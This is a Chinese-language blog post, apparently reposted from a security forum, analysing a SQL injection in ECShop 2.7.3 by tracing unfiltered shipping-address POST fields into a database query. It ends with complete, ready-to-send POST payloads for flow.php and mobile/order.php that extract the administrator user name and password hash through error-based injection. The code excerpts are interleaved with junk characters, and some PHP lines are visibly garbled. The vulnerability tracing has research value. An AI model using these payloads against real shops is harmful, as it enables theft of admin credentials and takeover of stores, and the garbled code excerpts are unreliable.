ecshop全版本注入分析

admin

前段时间大概2012年圣诞节左右，在t00ls上看见ecshop全版本注入，当时也下载了最新的程序分析了下,最近考试比较忙，今天刚考完，把我分析的记录下来。

    漏洞关键文件：

- [* \8 Z. [/ i    /includes/lib_order.php
# ~. ]$ |8 T* v
3 o3 n% O5 A5 v# j2 C0 G    关键函数：
+ o* `8 L: m/ J, ?! y


" n9 {0 L! k, E' f+ z01     function available_shipping_list($region_id_list)
6 X, Z$ I9 J3 X5 M7 k4 S
02 {
% E( g# Y+ S! [3 V
03     $sql = 'SELECT s.shipping_id, s.shipping_code, s.shipping_name, ' .
! |! H  M$ V9 D( U. r8 Y
04                 's.shipping_desc, s.insure, s.support_cod, a.configure ' .
, E+ R9 J" H$ O! n" l
05             'FROM ' . $GLOBALS['ecs']->table('shipping') . ' AS s, ' .
, W& z0 r4 r. }& b. D5 f' U
% X5 n8 S& v1 Q  }) u! _8 y' s06                 $GLOBALS['ecs']->table('shipping_area') . ' AS a, ' .
2 {$ O4 H0 z8 s0 T; A: H2 G  q
4 g% h. j5 n# o( p" b07                 $GLOBALS['ecs']->table('area_region') . ' AS r '.
9 ]  h* ~0 y6 s. Z/ T( Z! b. S
08             'WHERE r.region_id ' . db_create_in($region_id_list) .
( m! X2 v2 @: N! m  a  h: J
09             ' AND r.shipping_area_id = a.shipping_area_id AND a.shipping_id = s.shipping_id AND s.enabled = 1 ORDER BY s.shipping_order';
& l) |5 I0 m, u) E- p6 H
4 y4 i4 V) J/ {3 {& e" O10   

11     return $GLOBALS['db']->getAll($sql);
, M. b; j) s8 Y  Y) Y
12 }
9 b1 t9 }- ]( w* a
显然对传入的参数没有任何过滤就带入了查询语句。
( d, V' g* N; k# i
" }6 E) L# j+ P下面我们追踪这个函数在flow.php中：
第531行：   

1 $shipping_list     = available_shipping_list($region);

4 x) L1 j# {4 _6 M% O* N


% |' q7 H1 S7 I( b* Q2 U* y
再对传入变量进行追踪：
7 |! }8 ^1 P1 O" d0 Q  G5 |0 Q
" l; `" t; f' I/ ^1 B! W; [第530行：   

% D1 M5 F. m, c4 S& a0 T1 $region = array($consignee['country'], $consignee['province'],$consignee['city'], $consignee['district']);



2 A7 K, j" l2 O( |6 y1 \

  u: [, c- F. q. L第473行：        
( V: X% \9 u7 F( {
1 $consignee = get_consignee($_SESSION['user_id']);
2 ~; ^" G) ^7 z& x
到了一个关键函数：
) \' d% g$ d& m. Z, ~4 n
/includes/lib_order.php


: x+ B3 c8 o1 R/ E# ]- i5 E3 R2 S
, {/ c. |/ h! M& o
% ~: W8 {2 q/ c+ z" x
( C0 {. E; Q# r$ X" d4 W% F4 Q* E01 function get_consignee($user_id)
& T" r8 M% W. E! h( ^5 ^
02 {

6 f4 u& C' l8 v/ I03     if (isset($_SESSION['flow_consignee']))
7 B3 r! Z" m* d' \+ }
04     {
! M9 n4 S9 D0 _
  e& _4 k& ]: f05         /* 如果存在session，则直接返回session中的收货人信息 */

06   

' ^) K1 U9 V$ Z2 f# d07         return $_SESSION['flow_consignee'];
0 T' D% n$ A! V/ |
5 X! g2 q, I7 |/ V" R08     }

09     else

10     {

. Q/ U* Z8 \1 ^" u2 x, o9 M) F  V% D11         /* 如果不存在，则取得用户的默认收货人信息 */
8 V( |. o0 x7 x( o2 L8 T
6 i5 r, o% q; a/ a. O12         $arr = array();

13   
7 [) ^; N; x/ H5 F
! z, g6 f; }: ^9 X$ q14         if ($user_id > 0)
2 f. l0 v% b! D+ j" V* v
; C# z4 ^+ W" @$ c, }7 `# B15         {

16             /* 取默认地址 */

17             $sql = "SELECT ua.*".

18                     " FROM " . $GLOBALS['ecs']->table('user_address') . "AS ua, ".$GLOBALS['ecs']->table('users').' AS u '.

19                     " WHERE u.user_id='$user_id' AND ua.address_id = u.address_id";

' x: W$ [+ l! e, L7 p20   

+ i% c$ H( f9 u  E# y0 p  @  `4 Y8 W3 a5 O21             $arr = $GLOBALS['db']->getRow($sql);
# J2 U3 q/ _' o
22         }

23   
' X: _$ {3 {. c, [
24         return $arr;

25     }

26 }
+ y, n  B6 q8 k' E8 t4 D3 S
显然如果 isset($_SESSION['flow_consignee']存在就直接使用。到底存不存在呢？

6 |" N) L# T" ]4 O; f6 M

; [) T7 [3 t9 h4 D4 j关键点:
: c' v# m9 S" }. A4 y! [& B4 e
! E/ v2 }+ o: E' M9 x4 |" @4 r第400行：    $_SESSION['flow_consignee'] = stripslashes_deep($consignee);
1 |1 j1 d* Z$ i, ?. u
  j/ m0 f$ N4 `' C这里对传入参数反转义存入$_SESSION中。
8 o% y: r. s  n2 e8 w- p
) a: L- U7 V, X  u; X) [8 k+ n6 n. ^. ~
0 X! x2 z% T: x) F9 Z6 B# j
然后看下：
4 o8 b' Y7 Q/ m
8 @. b  _/ X4 W5 h
, ~1 e6 ?8 u3 L* H3 L5 ^
+ l: F1 k1 J6 f3 }   
! r+ w' [) ?+ E  }6 x! k" c
01 $consignee = array(
1 g; ^1 M6 n  R- a; y+ ?& B6 d- W
0 }" y# w2 C/ l6 V02         'address_id'    => empty($_POST['address_id']) ? 0  :intval($_POST['address_id']),
& A6 C: n5 X) L/ W6 N5 I# Y4 |
03         'consignee'     => empty($_POST['consignee'])  ? '' : trim($_POST['consignee']),

04         'country'       => empty($_POST['country'])    ? '' _POST['country'],
' P; e0 h- p$ I4 t! X, ]) x. d. }
9 D( i2 P# \0 j8 p# {05         'province'      => empty($_POST['province'])   ? '' _POST['province'],
0 ]0 H2 p& u( c! B7 V
06         'city'          => empty($_POST['city'])       ? '' _POST['city'],
- e8 p6 g3 P1 C, J9 T+ b
9 p/ P  @% ], U; @. ~' o07         'district'      => empty($_POST['district'])   ? '' _POST['district'],
+ p3 B8 X1 S9 A$ ^7 y0 z
% j8 V: ^: _- Z08         'email'         => empty($_POST['email'])      ? '' _POST['email'],

09         'address'       => empty($_POST['address'])    ? '' _POST['address'],

: v0 r! R' s& Y  M9 S10         'zipcode'       => empty($_POST['zipcode'])    ? '' : make_semiangle(trim($_POST['zipcode'])),
# O0 n8 h# y. k4 C$ T
" R, z0 O2 P8 N8 k3 y11         'tel'           => empty($_POST['tel'])        ? '' : make_semiangle(trim($_POST['tel'])),

9 t& S0 w, k7 I8 n! x0 }, O12         'mobile'        => empty($_POST['mobile'])     ? '' : make_semiangle(trim($_POST['mobile'])),

$ f' l' g5 Q3 V6 h1 J13         'sign_building' => empty($_POST['sign_building']) ? '' _POST['sign_building'],

5 \: s' C8 z8 }3 ~1 B: U  c1 m1 r14         'best_time'     => empty($_POST['best_time'])  ? '' _POST['best_time'],

& d9 f; `1 u  T3 p) U" _  f$ b15     );
- _( J: L% K) M0 n
3 s- o0 r& e6 N% p: t5 Z0 w$ j4 i7 e好了注入就这样出现了。

==================

: C% o; `/ d, n! H6 z注入测试：
, A: _2 @- i: m$ j$ C% o6 ~
环境:windows7+xampp1.7.7(Apache2.2.21+Php 5.3.8+Mysql 5.5.16)
+ @' ]0 j3 Y3 f) g
" R4 }$ t  M& A5 P测试程序：ECShop_V2.7.3_UTF8_release1106
/ H% H, p0 |$ `, X0 b& b

4 z4 j% H: Q( q8 A/ P, z
: @$ C8 x  v3 ?( h: ?1.首先需要点击一个商品加入购物车

. ?! R$ x) ^6 H# M' c4 m7 C2.注册一个会员帐号
3 O4 x9 O$ O: K1 n. P3 j, C
) b7 R5 J* Z* l0 B2 D0 `3.post提交数据
0 A3 t; [. O3 C5 e5 x# x1 ^1 h
4 O8 v+ e; r& [: j' Z1 D# W, ^

5 G0 V! E& h8 ~$ N0 P& Y1 http://127.0.0.1/ecshop/flow.php

, C. T, ?1 M! X- B: d2   
' x% y% y$ h% j8 Q
7 g* {% B  e* h3 country=1&province=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&step=consignee&act=checkout&address_id=
举一反三，我们根据这个漏洞我们可以继续深入挖掘：

4 L) ~& |& |- c: q9 X4 M我们搜寻关键函数function available_shipping_list()

在文件/moblie/order.php中出现有，次文件为手机浏览文件功能基本和flow.php相同，代码流程基本相同
4 T2 i3 D. |+ B$ F5 U: A6 M
利用exp:
5 N. @: L2 o7 n2 e4 y! l
1.点击一个商品，点击购买商标

: t+ J" |0 M  Z' Z2.登录会员帐号
1 Q1 n' p( ~. L( k, J6 a
3.post提交：

http://127.0.0.1/ecshop/mobile/order.php
! y* o7 U2 _9 k. _  @( ]2 ^
' I) D& s# t: Z5 h3 E+ x! I

( r4 s* \9 S. x" ^/ [% ]country=1&province=3') and (select 1 from(select count(*),concat((select (select (SELECT concat(user_name,0x7c,password) FROM ecs_admin_user limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 #&city=37&district=409&consignee=11111&email=11111111%40qq.com&address=1111111111&zipcode=11111111&tel=1111111111111111111&mobile=11111111&sign_building=111111111&best_time=111111111&Submit=%E9%85%8D%E9%80%81%E8%87%B3%E8%BF%99%E4%B8%AA%E5%9C%B0%E5%9D%80&&act=order_lise&address_id=